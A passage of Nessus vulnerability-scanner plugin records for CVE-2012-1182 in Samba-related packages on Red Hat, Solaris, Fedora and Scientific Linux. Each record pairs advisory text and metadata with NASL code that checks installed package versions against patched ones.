this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange servers using native protocols. 
Evolution-MAPI uses these libraries to integrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function. Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications. 
(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages, which fix these issues and add these enhancements.", "cvss3": {"score": null, "vector": null}, "published": "2013-02-21T00:00:00", "type": "nessus", "title": "RHEL 6 : openchange (RHSA-2013:0515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:evolution-mapi", "p-cpe:/a:redhat:enterprise_linux:evolution-mapi-debuginfo", "p-cpe:/a:redhat:enterprise_linux:evolution-mapi-devel", "p-cpe:/a:redhat:enterprise_linux:openchange", "p-cpe:/a:redhat:enterprise_linux:openchange-client", "p-cpe:/a:redhat:enterprise_linux:openchange-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openchange-devel", "p-cpe:/a:redhat:enterprise_linux:openchange-devel-docs", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/64763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0515. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64763);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"RHEL 6 : openchange (RHSA-2013:0515)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. 
(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:evolution-mapi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0515\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"evolution-mapi-debuginfo-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"evolution-mapi-debuginfo-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-client-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-client-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-debuginfo-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-debuginfo-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-debuginfo / evolution-mapi-devel / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:18", "description": "The remote Solaris system is missing necessary patches to address security updates 
:\n\n - The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call. (CVE-2012-1182)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : samba (cve_2012_1182_arbitrary_code)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:samba"], "id": "SOLARIS11_SAMBA_20121016.NASL", "href": "https://www.tenable.com/plugins/nessus/80762", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80762);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : samba (cve_2012_1182_arbitrary_code)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The RPC code generator in Samba 3.x before 3.4.16, 3.5.x\n before 3.5.14, and 3.6.x before 3.6.4 does not implement\n validation of an array length in a manner consistent\n with validation of array memory allocation, which allows\n remote attackers to execute arbitrary 
code via a crafted\n RPC call. (CVE-2012-1182)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-1182-arbitrary-code-execution-vulnerability-in-samba\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?640cfd84\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 7.5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:samba\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", 
\"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^samba$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.7.0.5.0\", sru:\"SRU 7.5\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : samba\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"samba\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:28", "description": "This update fixes CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-05-04T00:00:00", "type": "nessus", "title": "Fedora 15 : samba4-4.0.0-26.alpha11.fc15.6 (2012-6349)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba4", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-6349.NASL", "href": "https://www.tenable.com/plugins/nessus/58980", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6349.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58980);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6349\");\n\n script_name(english:\"Fedora 15 : samba4-4.0.0-26.alpha11.fc15.6 (2012-6349)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c44225e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"samba4-4.0.0-26.alpha11.fc15.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:47", "description": "A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. 
(CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References.\n\nThis update also fixes the following bug :\n\n - Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. 
This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted.\n\nWarning: If you upgrade from Scientific Linux 6.3 to Scientific Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-05T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : samba4 on SL6.x i386/x86_64 (20130221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba4", "p-cpe:/a:fermilab:scientific_linux:samba4-client", "p-cpe:/a:fermilab:scientific_linux:samba4-common", "p-cpe:/a:fermilab:scientific_linux:samba4-dc", "p-cpe:/a:fermilab:scientific_linux:samba4-dc-libs", "p-cpe:/a:fermilab:scientific_linux:samba4-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba4-devel", "p-cpe:/a:fermilab:scientific_linux:samba4-libs", "p-cpe:/a:fermilab:scientific_linux:samba4-pidl", "p-cpe:/a:fermilab:scientific_linux:samba4-python", "p-cpe:/a:fermilab:scientific_linux:samba4-swat", "p-cpe:/a:fermilab:scientific_linux:samba4-test", "p-cpe:/a:fermilab:scientific_linux:samba4-winbind", "p-cpe:/a:fermilab:scientific_linux:samba4-winbind-clients", "p-cpe:/a:fermilab:scientific_linux:samba4-winbind-krb5-locator", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20130221_SAMBA4_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba4 on SL6.x i386/x86_64 (20130221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. 
For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References.\n\nThis update also fixes the following bug :\n\n - Prior to this update, if the Active Directory (AD)\n server was rebooted, Winbind sometimes failed to\n reconnect when requested by 'wbinfo -n' or 'wbinfo -s'\n commands. Consequently, looking up users using the\n wbinfo tool failed. This update applies upstream patches\n to fix this problem and now looking up a Security\n Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller\n is rebooted.\n\nWarning: If you upgrade from Scientific Linux 6.3 to Scientific Linux\n6.4 and you have Samba in use, you should make sure that you uninstall\nthe package named 'samba4' to avoid conflicts during the upgrade.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=206\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c774b705\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", 